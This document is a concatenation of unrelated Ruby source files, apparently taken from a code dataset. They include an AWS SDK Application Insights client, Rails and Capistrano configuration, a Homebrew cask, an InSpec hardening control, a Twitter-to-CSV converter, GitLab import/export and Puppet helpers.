# @return [Types::ListComponentsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListComponentsResponse#application_component_list #application_component_list} => Array<Types::ApplicationComponent>
# * {Types::ListComponentsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_components({
# resource_group_name: "ResourceGroupName", # required
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.application_component_list #=> Array
# resp.application_component_list[0].component_name #=> String
# resp.application_component_list[0].component_remarks #=> String
# resp.application_component_list[0].resource_type #=> String
# resp.application_component_list[0].os_type #=> String, one of "WINDOWS", "LINUX"
# resp.application_component_list[0].tier #=> String, one of "CUSTOM", "DEFAULT", "DOT_NET_CORE", "DOT_NET_WORKER", "DOT_NET_WEB_TIER", "DOT_NET_WEB", "SQL_SERVER", "SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP", "MYSQL", "POSTGRESQL", "JAVA_JMX", "ORACLE", "SAP_HANA_MULTI_NODE", "SAP_HANA_SINGLE_NODE", "SAP_HANA_HIGH_AVAILABILITY", "SQL_SERVER_FAILOVER_CLUSTER_INSTANCE", "SHAREPOINT", "ACTIVE_DIRECTORY"
# resp.application_component_list[0].monitor #=> Boolean
# resp.application_component_list[0].detected_workload #=> Hash
# resp.application_component_list[0].detected_workload["Tier"] #=> Hash
# resp.application_component_list[0].detected_workload["Tier"]["MetaDataKey"] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListComponents AWS API Documentation
#
# @overload list_components(params = {})
# @param [Hash] params ({})
def list_components(params = {}, options = {})
req = build_request(:list_components, params)
req.send_request(options)
end
# Lists the INFO, WARN, and ERROR events for periodic configuration
# updates performed by Application Insights. Examples of events
# represented are:
#
# * INFO: creating a new alarm or updating an alarm threshold.
#
# * WARN: alarm not created due to insufficient data points used to
# predict thresholds.
#
# * ERROR: alarm not created due to permission errors or exceeding
# quotas.
#
# @option params [String] :resource_group_name
# Resource group to which the application belongs.
#
# @option params [Time,DateTime,Date,Integer,String] :start_time
# The start time of the event.
#
# @option params [Time,DateTime,Date,Integer,String] :end_time
# The end time of the event.
#
# @option params [String] :event_status
# The status of the configuration update event. Possible values include
# INFO, WARN, and ERROR.
#
# @option params [Integer] :max_results
# The maximum number of results returned by `ListConfigurationHistory`
# in paginated output. When this parameter is used,
# `ListConfigurationHistory` returns only `MaxResults` in a single page
# along with a `NextToken` response element. The remaining results of
# the initial request can be seen by sending another
# `ListConfigurationHistory` request with the returned `NextToken`
# value. If this parameter is not used, then `ListConfigurationHistory`
# returns all results.
#
# @option params [String] :next_token
# The `NextToken` value returned from a previous paginated
# `ListConfigurationHistory` request where `MaxResults` was used and the
# results exceeded the value of that parameter. Pagination continues
# from the end of the previous results that returned the `NextToken`
# value. This value is `null` when there are no more results to return.
#
# @return [Types::ListConfigurationHistoryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListConfigurationHistoryResponse#event_list #event_list} => Array<Types::ConfigurationEvent>
# * {Types::ListConfigurationHistoryResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_configuration_history({
# resource_group_name: "ResourceGroupName",
# start_time: Time.now,
# end_time: Time.now,
# event_status: "INFO", # accepts INFO, WARN, ERROR
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.event_list #=> Array
# resp.event_list[0].monitored_resource_arn #=> String
# resp.event_list[0].event_status #=> String, one of "INFO", "WARN", "ERROR"
# resp.event_list[0].event_resource_type #=> String, one of "CLOUDWATCH_ALARM", "CLOUDWATCH_LOG", "CLOUDFORMATION", "SSM_ASSOCIATION"
# resp.event_list[0].event_time #=> Time
# resp.event_list[0].event_detail #=> String
# resp.event_list[0].event_resource_name #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListConfigurationHistory AWS API Documentation
#
# @overload list_configuration_history(params = {})
# @param [Hash] params ({})
def list_configuration_history(params = {}, options = {})
req = build_request(:list_configuration_history, params)
req.send_request(options)
end
# Lists the log pattern sets in the specific application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListLogPatternSetsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListLogPatternSetsResponse#resource_group_name #resource_group_name} => String
# * {Types::ListLogPatternSetsResponse#log_pattern_sets #log_pattern_sets} => Array<String>
# * {Types::ListLogPatternSetsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_log_pattern_sets({
# resource_group_name: "ResourceGroupName", # required
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_pattern_sets #=> Array
# resp.log_pattern_sets[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListLogPatternSets AWS API Documentation
#
# @overload list_log_pattern_sets(params = {})
# @param [Hash] params ({})
def list_log_pattern_sets(params = {}, options = {})
req = build_request(:list_log_pattern_sets, params)
req.send_request(options)
end
# Lists the log patterns in the specific log `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @return [Types::ListLogPatternsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListLogPatternsResponse#resource_group_name #resource_group_name} => String
# * {Types::ListLogPatternsResponse#log_patterns #log_patterns} => Array<Types::LogPattern>
# * {Types::ListLogPatternsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_log_patterns({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName",
# max_results: 1,
# next_token: "PaginationToken",
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_patterns #=> Array
# resp.log_patterns[0].pattern_set_name #=> String
# resp.log_patterns[0].pattern_name #=> String
# resp.log_patterns[0].pattern #=> String
# resp.log_patterns[0].rank #=> Integer
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListLogPatterns AWS API Documentation
#
# @overload list_log_patterns(params = {})
# @param [Hash] params ({})
def list_log_patterns(params = {}, options = {})
req = build_request(:list_log_patterns, params)
req.send_request(options)
end
# Lists the problems with your application.
#
# @option params [String] :resource_group_name
# The name of the resource group.
#
# @option params [Time,DateTime,Date,Integer,String] :start_time
# The time when the problem was detected, in epoch seconds. If you
# don't specify a time frame for the request, problems within the past
# seven days are returned.
#
# @option params [Time,DateTime,Date,Integer,String] :end_time
# The time when the problem ended, in epoch seconds. If not specified,
# problems within the past seven days are returned.
#
# @option params [Integer] :max_results
# The maximum number of results to return in a single call. To retrieve
# the remaining results, make another call with the returned `NextToken`
# value.
#
# @option params [String] :next_token
# The token to request the next page of results.
#
# @option params [String] :component_name
#
# @return [Types::ListProblemsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListProblemsResponse#problem_list #problem_list} => Array<Types::Problem>
# * {Types::ListProblemsResponse#next_token #next_token} => String
# * {Types::ListProblemsResponse#resource_group_name #resource_group_name} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_problems({
# resource_group_name: "ResourceGroupName",
# start_time: Time.now,
# end_time: Time.now,
# max_results: 1,
# next_token: "PaginationToken",
# component_name: "ComponentName",
# })
#
# @example Response structure
#
# resp.problem_list #=> Array
# resp.problem_list[0].id #=> String
# resp.problem_list[0].title #=> String
# resp.problem_list[0].insights #=> String
# resp.problem_list[0].status #=> String, one of "IGNORE", "RESOLVED", "PENDING", "RECURRING"
# resp.problem_list[0].affected_resource #=> String
# resp.problem_list[0].start_time #=> Time
# resp.problem_list[0].end_time #=> Time
# resp.problem_list[0].severity_level #=> String, one of "Low", "Medium", "High"
# resp.problem_list[0].resource_group_name #=> String
# resp.problem_list[0].feedback #=> Hash
# resp.problem_list[0].feedback["FeedbackKey"] #=> String, one of "NOT_SPECIFIED", "USEFUL", "NOT_USEFUL"
# resp.problem_list[0].recurring_count #=> Integer
# resp.problem_list[0].last_recurrence_time #=> Time
# resp.next_token #=> String
# resp.resource_group_name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListProblems AWS API Documentation
#
# @overload list_problems(params = {})
# @param [Hash] params ({})
def list_problems(params = {}, options = {})
req = build_request(:list_problems, params)
req.send_request(options)
end
# Retrieve a list of the tags (keys and values) that are associated with
# a specified application. A *tag* is a label that you optionally define
# and associate with an application. Each tag consists of a required
# *tag key* and an optional associated *tag value*. A tag key is a
# general label that acts as a category for more specific tag values. A
# tag value acts as a descriptor within a tag key.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the application that you want to
# retrieve tag information for.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Array<Types::Tag>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "AmazonResourceName", # required
# })
#
# @example Response structure
#
# resp.tags #=> Array
# resp.tags[0].key #=> String
# resp.tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Add one or more tags (keys and values) to a specified application. A
# *tag* is a label that you optionally define and associate with an
# application. Tags can help you categorize and manage application in
# different ways, such as by purpose, owner, environment, or other
# criteria.
#
# Each tag consists of a required *tag key* and an associated *tag
# value*, both of which you define. A tag key is a general label that
# acts as a category for more specific tag values. A tag value acts as a
# descriptor within a tag key.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the application that you want to add
# one or more tags to.
#
# @option params [required, Array<Types::Tag>] :tags
# A list of tags that to add to the application. A tag consists of a
# required tag key (`Key`) and an associated tag value (`Value`). The
# maximum length of a tag key is 128 characters. The maximum length of a
# tag value is 256 characters.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.tag_resource({
# resource_arn: "AmazonResourceName", # required
# tags: [ # required
# {
# key: "TagKey", # required
# value: "TagValue", # required
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/TagResource AWS API Documentation
#
# @overload tag_resource(params = {})
# @param [Hash] params ({})
def tag_resource(params = {}, options = {})
req = build_request(:tag_resource, params)
req.send_request(options)
end
# Remove one or more tags (keys and values) from a specified
# application.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) of the application that you want to
# remove one or more tags from.
#
# @option params [required, Array<String>] :tag_keys
# The tags (tag keys) that you want to remove from the resource. When
# you specify a tag key, the action removes both that key and its
# associated tag value.
#
# To remove more than one tag from the application, append the `TagKeys`
# parameter and argument for each additional tag to remove, separated by
# an ampersand.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.untag_resource({
# resource_arn: "AmazonResourceName", # required
# tag_keys: ["TagKey"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UntagResource AWS API Documentation
#
# @overload untag_resource(params = {})
# @param [Hash] params ({})
def untag_resource(params = {}, options = {})
req = build_request(:untag_resource, params)
req.send_request(options)
end
# Updates the application.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [Boolean] :ops_center_enabled
# When set to `true`, creates opsItems for any problems detected on an
# application.
#
# @option params [Boolean] :cwe_monitor_enabled
# Indicates whether Application Insights can listen to CloudWatch events
# for the application resources, such as `instance terminated`, `failed
# deployment`, and others.
#
# @option params [String] :ops_item_sns_topic_arn
# The SNS topic provided to Application Insights that is associated to
# the created opsItem. Allows you to receive notifications for updates
# to the opsItem.
#
# @option params [Boolean] :remove_sns_topic
# Disassociates the SNS topic from the opsItem created for detected
# problems.
#
# @option params [Boolean] :auto_config_enabled
#
# @return [Types::UpdateApplicationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateApplicationResponse#application_info #application_info} => Types::ApplicationInfo
#
# @example Request syntax with placeholder values
#
# resp = client.update_application({
# resource_group_name: "ResourceGroupName", # required
# ops_center_enabled: false,
# cwe_monitor_enabled: false,
# ops_item_sns_topic_arn: "OpsItemSNSTopicArn",
# remove_sns_topic: false,
# auto_config_enabled: false,
# })
#
# @example Response structure
#
# resp.application_info.resource_group_name #=> String
# resp.application_info.life_cycle #=> String
# resp.application_info.ops_item_sns_topic_arn #=> String
# resp.application_info.ops_center_enabled #=> Boolean
# resp.application_info.cwe_monitor_enabled #=> Boolean
# resp.application_info.remarks #=> String
# resp.application_info.auto_config_enabled #=> Boolean
# resp.application_info.discovery_type #=> String, one of "RESOURCE_GROUP_BASED", "ACCOUNT_BASED"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateApplication AWS API Documentation
#
# @overload update_application(params = {})
# @param [Hash] params ({})
def update_application(params = {}, options = {})
req = build_request(:update_application, params)
req.send_request(options)
end
# Updates the custom component name and/or the list of resources that
# make up the component.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [String] :new_component_name
# The new name of the component.
#
# @option params [Array<String>] :resource_list
# The list of resource ARNs that belong to the component.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_component({
# resource_group_name: "ResourceGroupName", # required
# component_name: "CustomComponentName", # required
# new_component_name: "CustomComponentName",
# resource_list: ["ResourceARN"],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateComponent AWS API Documentation
#
# @overload update_component(params = {})
# @param [Hash] params ({})
def update_component(params = {}, options = {})
req = build_request(:update_component, params)
req.send_request(options)
end
# Updates the monitoring configurations for the component. The
# configuration input parameter is an escaped JSON of the configuration
# and should match the schema of what is returned by
# `DescribeComponentConfigurationRecommendation`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :component_name
# The name of the component.
#
# @option params [Boolean] :monitor
# Indicates whether the application component is monitored.
#
# @option params [String] :tier
# The tier of the application component. Supported tiers include
# `DOT_NET_WORKER`, `DOT_NET_WEB`, `DOT_NET_CORE`, `SQL_SERVER`, and
# `DEFAULT`.
#
# @option params [String] :component_configuration
# The configuration settings of the component. The value is the escaped
# JSON of the configuration. For more information about the JSON format,
# see [Working with JSON][1]. You can send a request to
# `DescribeComponentConfigurationRecommendation` to see the recommended
# configuration for a component. For the complete format of the
# component configuration file, see [Component Configuration][2].
#
#
#
# [1]: https://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/working-with-json.html
# [2]: https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/component-config.html
#
# @option params [Boolean] :auto_config_enabled
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
# @example Request syntax with placeholder values
#
# resp = client.update_component_configuration({
# resource_group_name: "ResourceGroupName", # required
# component_name: "ComponentName", # required
# monitor: false,
# tier: "CUSTOM", # accepts CUSTOM, DEFAULT, DOT_NET_CORE, DOT_NET_WORKER, DOT_NET_WEB_TIER, DOT_NET_WEB, SQL_SERVER, SQL_SERVER_ALWAYSON_AVAILABILITY_GROUP, MYSQL, POSTGRESQL, JAVA_JMX, ORACLE, SAP_HANA_MULTI_NODE, SAP_HANA_SINGLE_NODE, SAP_HANA_HIGH_AVAILABILITY, SQL_SERVER_FAILOVER_CLUSTER_INSTANCE, SHAREPOINT, ACTIVE_DIRECTORY
# component_configuration: "ComponentConfiguration",
# auto_config_enabled: false,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateComponentConfiguration AWS API Documentation
#
# @overload update_component_configuration(params = {})
# @param [Hash] params ({})
def update_component_configuration(params = {}, options = {})
req = build_request(:update_component_configuration, params)
req.send_request(options)
end
# Adds a log pattern to a `LogPatternSet`.
#
# @option params [required, String] :resource_group_name
# The name of the resource group.
#
# @option params [required, String] :pattern_set_name
# The name of the log pattern set.
#
# @option params [required, String] :pattern_name
# The name of the log pattern.
#
# @option params [String] :pattern
# The log pattern. The pattern must be DFA compatible. Patterns that
# utilize forward lookahead or backreference constructions are not
# supported.
#
# @option params [Integer] :rank
# Rank of the log pattern. Must be a value between `1` and `1,000,000`.
# The patterns are sorted by rank, so we recommend that you set your
# highest priority patterns with the lowest rank. A pattern of rank `1`
# will be the first to get matched to a log line. A pattern of rank
# `1,000,000` will be last to get matched. When you configure custom log
# patterns from the console, a `Low` severity pattern translates to a
# `750,000` rank. A `Medium` severity pattern translates to a `500,000`
# rank. And a `High` severity pattern translates to a `250,000` rank.
# Rank values less than `1` or greater than `1,000,000` are reserved for
# AWS-provided patterns.
#
# @return [Types::UpdateLogPatternResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::UpdateLogPatternResponse#resource_group_name #resource_group_name} => String
# * {Types::UpdateLogPatternResponse#log_pattern #log_pattern} => Types::LogPattern
#
# @example Request syntax with placeholder values
#
# resp = client.update_log_pattern({
# resource_group_name: "ResourceGroupName", # required
# pattern_set_name: "LogPatternSetName", # required
# pattern_name: "LogPatternName", # required
# pattern: "LogPatternRegex",
# rank: 1,
# })
#
# @example Response structure
#
# resp.resource_group_name #=> String
# resp.log_pattern.pattern_set_name #=> String
# resp.log_pattern.pattern_name #=> String
# resp.log_pattern.pattern #=> String
# resp.log_pattern.rank #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/application-insights-2018-11-25/UpdateLogPattern AWS API Documentation
#
# @overload update_log_pattern(params = {})
# @param [Hash] params ({})
def update_log_pattern(params = {}, options = {})
req = build_request(:update_log_pattern, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-applicationinsights'
context[:gem_version] = '1.30.0'
Seahorse::Client::Request.new(handlers, context)
end
# @api private
# @deprecated
def waiter_names
[]
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 45.726789 | 407 | 0.68063 |
1cf7e19e1868754d4611abb040fe0e4f0b10ba9d | 839 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = '1.0'
# Add additional assets to the asset load path.
# Rails.application.config.assets.paths << Emoji.images_path
# Add Yarn node_modules folder to the asset load path.
Rails.application.config.assets.paths << Rails.root.join('node_modules')
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in the app/assets
# folder are already added.
# Rails.application.config.assets.precompile += %w( admin.js admin.css )
Rails.application.config.assets.precompile << 'roller.js'
Rails.application.config.assets.precompile << 'gm.js'
Rails.application.config.assets.precompile << 'fontawesome/' + /\.(?:svg|eot|woff2?|ttf)\z/.to_s
| 46.611111 | 96 | 0.764005 |
918534d9e3c46e2306fc7ba8c6067ae1a3a60b99 | 396 | require "serverkit/resources/base"
module Serverkit
module Resources
class Service < Base
attribute :name, required: true, type: String
# @note Override
def apply
run_command_from_identifier(:start_service, name)
end
# @note Override
def check
check_command_from_identifier(:check_service_is_running, name)
end
end
end
end
| 19.8 | 70 | 0.671717 |
3875db1ff4b0cbc8221a2ee478907faa058d60af | 103 | require 'rails_helper'
describe 'the test' do
it 'is a success' do
expect(1).to eq(1)
end
end
| 12.875 | 22 | 0.660194 |
918e96202d88c059d38f40a4c5862d45f4fd624e | 651 | cask "keep-it" do
version "1.9.3"
sha256 "803afba6a2c178d59c39f80244875009e6605d8b6c75a609f9cb1fa85f38b476"
url "https://reinventedsoftware.com/keepit/downloads/KeepIt_#{version}.dmg"
appcast "https://reinventedsoftware.com/keepit/downloads/keepit.xml"
name "Keep It"
desc "Notebook, scrapbook and organizer tool"
homepage "https://reinventedsoftware.com/keepit/"
auto_updates true
depends_on macos: ">= :catalina"
app "Keep It.app"
zap trash: [
"~/Library/Containers/com.reinvented.Keep-It-Indexing",
"~/Library/Containers/com.reinvented.Keep-It-Metadata",
"~/Library/Containers/com.reinvented.Keep It",
]
end
| 29.590909 | 77 | 0.741935 |
d58b953333c170259390568aa48f2163147dafbe | 1,211 | control "PHTN-10-000095" do
title "The Photon operating system must be configured so that the x86
Ctrl-Alt-Delete key sequence is disabled on the command line."
desc "When the Ctrl-Alt-Del target is enabled, locally logged-on user who
presses Ctrl-Alt-Delete, when at the console, can reboot the system. If
accidentally pressed, as could happen in the case of a mixed OS environment,
this can create the risk of short-term loss of availability of systems due to
unintentional reboot. "
impact 0.5
tag severity: "CAT II"
tag gtitle: "SRG-OS-000480-GPOS-00227"
tag gid: nil
tag rid: "PHTN-10-000095"
tag stig_id: "PHTN-10-000095"
tag cci: "CCI-000366"
tag nist: ["CM-6 b", "Rev_4"]
desc 'check', "At the command line, execute the following command:
# systemctl status ctrl-alt-del.target
Expected result:
ctrl-alt-del.target
Loaded: masked (/dev/null; bad)
Active: inactive (dead)
If the output does not match the expected result, this is a finding"
desc 'fix', "At the command line, execute the following command:
# systemctl mask ctrl-alt-del.target"
describe systemd_service('ctrl-alt-del.target') do
it { should_not be_enabled}
it { should_not be_running}
end
end
| 31.051282 | 77 | 0.738233 |
f71d74d3bb308420571664385faf9f139a4361d8 | 5,755 | # encoding: utf-8
module CartoDB
module TwitterSearch
class JSONToCSVConverter
INDIVIDUAL_FIELDS = [
:link,
:body,
:objectType,
:postedTime,
:favoritesCount,
:twitter_lang,
:retweetCount
]
GROUP_FIELDS = [
:actor,
:inReplyTo,
:geo,
:twitter_entities, # Save json string,
:location
]
# Same as above but with fields inside a group field
SUBGROUP_FIELDS_TO_DUMP = {
actor: [
:links, # links[0].href
:location, # May be a Twitter Place, with a displayName and objectType, or a simple String
:languages # languages[0]
],
# if this gets renamed to the_geom, cartodb will import it as a bounding box
location: [
:geo
],
# same as location->geo, but as a point, so should have higher priority
}
# This fields will get dumped as field_subfield. If not present here will be saved as a stringified json
SUBFIELDS = {
actor: [
:id,
:displayName,
:image,
:summary,
:postedTime,
:location,
:utcOffset,
:preferredUsername,
:friendsCount,
:followersCount,
:listedCount,
:statusesCount,
:verified
],
inReplyTo: [
:link
],
location: [
:geo,
:name
]
}
# Other fields with special behaviour we want to add
CARTODB_FIELDS = [
:the_geom
]
def generate_headers(additional_fields = {})
process([], true, additional_fields)
end
# Note: 'the_geom' will be added automatically, no need to add as additional field
def process(input_data, add_headers = true, additional_fields = {})
results = []
if add_headers
results_row = INDIVIDUAL_FIELDS.map { |field|
field_to_csv(field)
}
GROUP_FIELDS.each do |field|
if SUBFIELDS[field].nil?
results_row << field_to_csv(field)
else
SUBFIELDS[field].each do |subfield|
results_row << field_to_csv("#{field.to_s}_#{subfield.to_s}")
end
end
end
CARTODB_FIELDS.each do |field|
results_row << field_to_csv(field)
end
additional_fields.each do |key, _value|
results_row << field_to_csv(key)
end
results << results_row.join(',')
end
# Data rows
input_data.each do |item|
results_row = []
INDIVIDUAL_FIELDS.each do |field|
results_row << (item[field].nil? ? nil : field_to_csv(item[field]))
end
GROUP_FIELDS.each do |field|
# Group field has no subfields "defined"? then must be dumped
if SUBFIELDS[field].nil?
if !item[field].nil?
results_row << field_to_csv(::JSON.dump(item[field]))
else
results_row << nil
end
else
# Go inside fields, repeat similar logic
SUBFIELDS[field].each do |subfield|
if !item[field].nil? && !item[field][subfield].nil?
# Subitems will either get written as they are or dumped
if !SUBGROUP_FIELDS_TO_DUMP[field].nil? && SUBGROUP_FIELDS_TO_DUMP[field].include?(subfield)
results_row << field_to_csv(::JSON.dump(item[field][subfield]))
else
results_row << field_to_csv(item[field][subfield])
end
else
results_row << nil
end
end
end
end
CARTODB_FIELDS.each do |field|
if field == :the_geom
results_row << field_to_csv(calculate_the_geom(item))
end
end
additional_fields.each do |_key, value|
results_row << field_to_csv(value)
end
results << results_row.join(',')
end
results.join("\n")
end
# INFO: This gets called before field-by-field parsing to speed up things
def clean_string(contents)
contents.gsub("\\n", ' ').gsub("\\r", ' ')
end
private
def field_to_csv(field)
# RFC4180
'"' + field.to_s.gsub('"', '""').gsub("\\", ' ').gsub("\x0D", ' ').gsub("\x0A", ' ').gsub("\0", '') + '"'
end
def calculate_the_geom(row)
output = nil
# Point
if !row[:geo].nil? && !row[:geo].empty?
# Twitter/Gnip bug: They give GeoJSON-like with (lat,lon) point, so transform to proper GeoJSON (lon,lat)
# Only happens here, location geo is fine, bounding boxes are fine, geo-enrichment is fine too
lat = row[:geo][:coordinates][0]
row[:geo][:coordinates][0] = row[:geo][:coordinates][1]
row[:geo][:coordinates][1] = lat
output = ::JSON.dump(row[:geo])
# Geo-enrichment
elsif !row[:gnip].nil? && !row[:gnip].empty? && !row[:gnip][:profileLocations].nil? &&
!row[:gnip][:profileLocations].empty?
row[:gnip][:profileLocations].each do |location|
# Store first point found (only)
if !location[:geo].nil? && !location[:geo].empty? && !location[:geo][:type].nil? &&
!location[:geo][:type].empty? && location[:geo][:type] == 'point' && output.nil?
output = ::JSON.dump(location[:geo])
end
end
end
output
end
end
end
end
| 29.512821 | 115 | 0.520938 |
6a053e35669f67c895664e2fd3b28a207b1865bf | 123 | require "spec_helper"
describe Watsi do
it "has a version number" do
expect(Watsi::VERSION).not_to be nil
end
end
| 15.375 | 40 | 0.723577 |
6127290e9ce3d787eaa672968fef089211ff29c9 | 784 | require "reflexive/routing_helpers"
class Method
def reflexive_url
level = receiver.instance_of?(Class) ? :class : :instance
klass = receiver.instance_of?(Class) ? receiver : receiver.class
Reflexive::Application.default_url_prefix +
Reflexive::RoutingHelpers.new_method_path(klass, level, name)
end
end
class UnboundMethod
def reflexive_url
Reflexive::Application.default_url_prefix +
Reflexive::RoutingHelpers.new_method_path(owner, :instance, name)
end
end
class Class
def reflexive_url
Reflexive::Application.default_url_prefix +
Reflexive::RoutingHelpers.constant_path(self)
end
end
class Module
def reflexive_url
Reflexive::Application.default_url_prefix +
Reflexive::RoutingHelpers.constant_path(self)
end
end | 25.290323 | 71 | 0.765306 |
6a7b24421c91ae0bc03171a295729a7ce2460e74 | 1,068 | # frozen_string_literal: true
module Gitlab
module ImportExport
module Project
class BaseTask
include Gitlab::WithRequestStore
def initialize(opts, logger: Logger.new($stdout))
@project_path = opts.fetch(:project_path)
@file_path = opts.fetch(:file_path)
@namespace = Namespace.find_by_full_path(opts.fetch(:namespace_path))
@current_user = User.find_by_username(opts.fetch(:username))
@measurement_enabled = opts.fetch(:measurement_enabled)
@measurement = Gitlab::Utils::Measuring.new(logger: logger) if @measurement_enabled
@logger = logger
end
private
attr_reader :measurement, :project, :namespace, :current_user, :file_path, :project_path, :logger
def measurement_enabled?
@measurement_enabled
end
def success(message)
logger.info(message)
true
end
def error(message)
logger.error(message)
false
end
end
end
end
end
| 25.428571 | 105 | 0.623596 |
0162e8327ee77748e63224c05bcba783ea7d26ee | 1,205 | #
# hash.rb
#
module Puppet::Parser::Functions
newfunction(:hash, :type => :rvalue, :doc => <<-DOC
This function converts an array into a hash.
*Examples:*
hash(['a',1,'b',2,'c',3])
Would return: {'a'=>1,'b'=>2,'c'=>3}
Note: Since Puppet 5.0.0 type conversions can in general be performed by using the Puppet Type System.
See the function new() in Puppet for a wide range of available type conversions.
This example shows the equivalent expression in the Puppet language:
Hash(['a',1,'b',2,'c',3])
Hash([['a',1],['b',2],['c',3]])
DOC
) do |arguments|
raise(Puppet::ParseError, "hash(): Wrong number of arguments given (#{arguments.size} for 1)") if arguments.empty?
array = arguments[0]
unless array.is_a?(Array)
raise(Puppet::ParseError, 'hash(): Requires array to work with')
end
result = {}
begin
# This is to make it compatible with older version of Ruby ...
array = array.flatten
result = Hash[*array]
rescue StandardError
raise(Puppet::ParseError, 'hash(): Unable to compute hash from array given')
end
return result
end
end
# vim: set ts=2 sw=2 et :
| 26.195652 | 118 | 0.618257 |
fff4213dbe938df1e638027a015b33a041b6dd39 | 134 | set :application, 'DMPHub_Stage_x2'
server 'uc3-dmphub02x2-stg.cdlib.org', user: 'dmp', roles: %w[web app db]
set :rails_env, 'stage'
| 33.5 | 73 | 0.723881 |
187e0b98c9948c47b713317e9900744ef47e9e7a | 230 | class MarketSell < ActiveRecord::Base
belongs_to :item
belongs_to :base
validates :quantity, numericality: {only_integer: true}
validates :price, numericality: true
def to_s
